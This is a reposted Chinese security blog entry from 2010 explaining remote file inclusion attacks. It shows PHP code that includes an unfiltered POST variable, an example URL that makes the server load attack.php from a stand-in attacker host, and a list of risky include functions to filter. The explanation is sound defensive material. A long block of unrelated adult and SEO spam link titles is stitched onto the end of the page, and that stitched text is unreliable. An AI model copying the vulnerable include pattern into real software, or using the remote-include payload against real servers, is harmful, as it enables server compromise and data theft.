• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉】WEB安全系列之三:執行惡意腳本

                * 惡意代碼執行攻擊利用的重點是web開發中引用變量做為程序執行的一部分代碼
                * 惡意代碼執行攻擊的技術重點在于讓服務器執行了惡意代碼,從而完成入侵或數據盜取等行為
                * 惡意代碼執行攻擊的方法重點在于Web開發中,對變量的引用的幾個關鍵部位沒有細化處理


               本文主要介紹惡意代碼執行攻擊的過程而不是技術細節。
            先看一段php代碼的例子:

            $report = $_POST['file']; //定義report變量某個表單變量
            include $report;          //在代碼中包含此變量

            如果攻擊者巧妙的利用這個漏洞,就可以令被攻擊服務器執行自己的惡意程序,類似的語法:
            http://www.tester.com/index.php?file=http://www.hacker.com/attack.php

            這時,程序就會讀取惡意的attack.php并引入到index.php中做為執行的一個部分!

            此類攻擊對于腳本類網頁代碼最有效。

            在編寫代碼時,尤其是利用以下的函數引用代碼片段時:
            PHP:include(), include_once(), require(), require_once(), fopen(), readfile(), ...
            JSP/Servlet:java.io.File(), java.io.FileReader(), ...
            ASP:include file, include virtual, ...
            應該對所引用的內容做安全的過濾!

            posted on 2010-04-14 14:24 小默 閱讀(599) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            精品久久久久中文字幕一区| 狠狠色婷婷久久综合频道日韩 | 久久亚洲国产中v天仙www | 久久人人添人人爽添人人片牛牛| 2021国产精品午夜久久| 97久久香蕉国产线看观看| 国内精品伊人久久久久网站| 天堂久久天堂AV色综合| 久久久久亚洲av成人无码电影 | 国内精品久久久久国产盗摄| 亚洲欧美伊人久久综合一区二区 | 一本色道久久综合狠狠躁| 91亚洲国产成人久久精品| 热99RE久久精品这里都是精品免费| 精品久久久久久无码专区| 久久久国产视频| 女同久久| 久久婷婷五月综合97色直播| 久久精品国产精品青草app| 亚洲国产精品久久久天堂| 少妇无套内谢久久久久| 亚洲欧洲久久av| 无码乱码观看精品久久| 超级碰久久免费公开视频| 国产精品久久久久久久久| 国产精品久久久久影院嫩草| 久久精品中文字幕无码绿巨人| 精品久久久久久久国产潘金莲| 久久久国产精品| 久久久精品视频免费观看| 国内精品久久久久久久涩爱| 精品久久人人爽天天玩人人妻| 久久国产美女免费观看精品| 国产成人精品久久亚洲高清不卡 国产成人精品久久亚洲高清不卡 国产成人精品久久亚洲 | 久久久久人妻精品一区| 成人午夜精品无码区久久| 伊人久久精品无码二区麻豆| 亚洲精品乱码久久久久久久久久久久 | 久久大香萑太香蕉av| 欧美亚洲国产精品久久| 久久久久久伊人高潮影院|